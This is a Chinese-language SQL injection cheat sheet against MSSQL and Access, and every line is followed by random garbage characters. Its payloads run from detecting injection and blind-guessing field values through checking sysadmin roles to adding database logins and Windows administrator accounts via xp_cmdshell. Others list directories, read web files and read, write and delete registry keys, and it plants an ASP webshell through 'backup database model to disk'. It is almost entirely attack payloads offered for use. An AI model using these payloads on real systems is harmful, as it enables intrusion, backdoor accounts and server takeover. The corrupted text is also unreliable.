1.判断是否有注入;and 1=1 ;and 1=2 7P}&<;5zD�
2.初步判断是否是mssql ;and user>0 ��o&2(xI�2
��/[f9Z:>V
3.注入参数是字符'and [查询条件] and ''=' F�?b5�!�<5
N�YwE=b~I
4.搜索时没过滤参数的'and [查询条件] and '%25'=' s��7�RA�ui
H�38�ODWO3
5.判断数据库系统 Y8I*��B�=7
NABwtx�>.
;and (select count(*) from sysobjects)>0 mssql g70B�22!y�
<��^�j,jX
;and (select count(*) from msysobjects)>0 access r5�ON�Aa3.
WLr\ ��l29
/A3��tY"Vn
�X}?�`G?'�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ><o��d�BM-
j6w�dqa9!~
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �Hm=!;xAFX
V�EAf�,{)Q
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 V:?e�xJ�g9
�s;-(�dQ{O
9.(1)猜字段的ascii值(access) ��#DMt<1#:
Gv,_;�?7lD
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �8=;�'kEU�
L\L/+yNv:G
(2)猜字段的ascii值(mssql) }K\�]��M@�
�UR')) 1�n
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �h+o-��h4X
s�53�P�w>f
10.测试权限结构(mssql) %";bgU�2�Q
>"�q�nuv G
��I$@0F�Sl
H.�sHX�u�u
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ?�3ldH�Wa�
�Z1��j3��F
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- BLz�l�XhHn
hr9[$�4'H�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- `� <+MR6M�
u�W*)B_��c
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- |�/,XdT�Sy
e 5hq�>�K
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- T%kr&XsQ�X
tu�zw%�=Ey
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- rwb7>]UI"d
0pT?�q�sM2
;and 1=(select IS_MEMBER('db_owner'));--
^J�,Zl`N�
K�j|��l]'
�gzS6{570�
?[�#nh@mI�
11.添加mssql和系统的帐户 � �5VWyc9Q
Q/EH�vb]��
;exec master.dbo.sp_addlogin username;-- }E626d}uA�
;exec master.dbo.sp_password null,username,password;-- ����[R�$iX
G�}�B)b�M2
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ��4L(/Z}�(
(=n��{�LMa
;exec master.dbo.xp_cmdshell 'net user username password 3z�$9jN/<u
"M.�\Z9BCt
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �'l�,�ym~R
�Opc, {,z6
;exec master.dbo.xp_cmdshell 'net user username password /add';-- .�t\��#>Fe
�|E/�r6�4T
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- `�w@8i�[2J
L;d(|7BV�v
5;�{Q �>n�
Ke0��j8�|�
12.(1)遍历目录 :7�7dl/�d%
]"Y?�
ZS;H
;create table dirs(paths varchar(100), id int) G:��'hT=8
d�tHB�@\1
;insert dirs exec master.dbo.xp_dirtree 'c:\' IKT3T_�\-I
$n |�)M�+d
;and (select top 1 paths from dirs)>0 ,,_�$r7H`�
r+�6��=b"
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) !g=2U�`�j^
I<p- o/T�P
Z(F`M;1>xI
49vKb(bz�{
(2)遍历目录 D�bRq�,T��
�1D�3�{�\v
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- g"�pjWj)?�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 p�Y75S�5h:
Gt���>*y.]
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 n#F�:(MSOp
>K<�n~;ON|
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �luNEg��Cq
k�zq3-�NTV
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 Yy��l(<,Yi
x+niY;Z �E
y7a�8�4)j3
W�vV!F?uqZ
13.mssql中的存储过程 �%Z��T@&��
8�_y�hV�{�
xp_regenumvalues 注册表根键, 子键 W dM?{;�
#
��v�(5zS�o
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ^!� ?w�h�
ma__LWKM,�
xp_regread 根键,子键,键值名 b#XY�.+ *0
WX@��a2c.'
;exec xp_regread v?\Z4Z�|�f
C�t-^�-XD
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 g<ZB9;FX %
5,H,�OZ}
xp_regwrite 根键,子键, 值名, 值类型, 值 H�B+{vuN*L
0O,Q]P 82f
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 IIrp-E�MXJ
$��C�T��2E
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 >�"}z
%� #
�i@Vi.oc4[
xp_regdeletevalue 根键,子键,值名 Qf�HJZ7K.4
>x���/;'Y.
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 s��/' ]* n
FV�i�7gg.?
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 puE!7��:X7
'J�A<�q-Gn
ZboY]1�L[j
VZ69s{/.�B
14.mssql的backup创建webshell Pcx��Cal4�
>M�`ryM2=D
use model W�7R��`})F
IY�Z$a/{�P
create table cmd(str image); �9c `Vr�lu
>P-�{2
a,4
insert into cmd(str) values (''); ExJ��ch�\�
'fIBJ3s[o�
backup database model to disk='c:\l.asp'; |2t�tdc.�
6�;JlA�})�
j>�D[i�HrH
2D`_��!OG=
15.mssql内置函数 ���j,��:vK
�B)^u�GS�W
;and (select @@version)>0 获得Windows的版本号 -pb>=@Y�q
�)I/K-�z�j
;and user_name()='dbo' 判断当前系统的连接用户是不是sa \%=GM
J^[p
�y5oC|v��7
;and (select user_name())>0 爆当前系统的连接用户 �B�<et&r;�
$7������\!
;and (select db_name())>0 得到当前连接的数据库 g�#??Mz���
.=I:cniw\r
}{3�Xb��vC
BRSOE U�\=
16.简洁的webshell o��Qs�ls9t
'h]sq����{
use model a�t(oe��pq
�;s$bVG�Hr
create table cmd(str image); 9�/�LnO'&-
-�Fx�E!K��
insert into cmd(str) values (''); JZc"4qf@OT
�d�� z���-
backup database model to disk='g:\wwwtest\l.asp';
